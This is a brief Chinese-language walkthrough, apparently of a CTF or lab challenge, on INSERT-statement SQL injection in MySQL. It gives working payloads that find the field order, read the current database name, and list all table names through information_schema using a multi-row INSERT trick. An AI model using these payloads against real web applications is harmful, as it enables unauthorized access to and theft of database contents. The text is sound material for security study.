A1：Insert型注入

1、输入内容，确定内容输出位置，确定插入字段顺序

输入test')-- -，页面报错，可知test并非最后一个字段，继续尝试test','123')，页面返回正常，确定test是倒数第二个字段，，

2、test后构造第三个字段来尝试爆数据库数据

test',(select database()))-- -，结果发现第三个字段比较特殊，我们输入的数据库信息都会被替代为全0的日期格式，，，

3、利用mysql插入语句的特殊性，即一次可以插入多行数据

同时插入两行数据(爆当前数据库)：test','123'),('anonymous',(select database()),'123') -- -

4、爆当前数据库中的所有表

test','123'),('anonymous',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'123') -- -

5、脖子有点疼，，，，爆字段，爆值就不一一进行了，，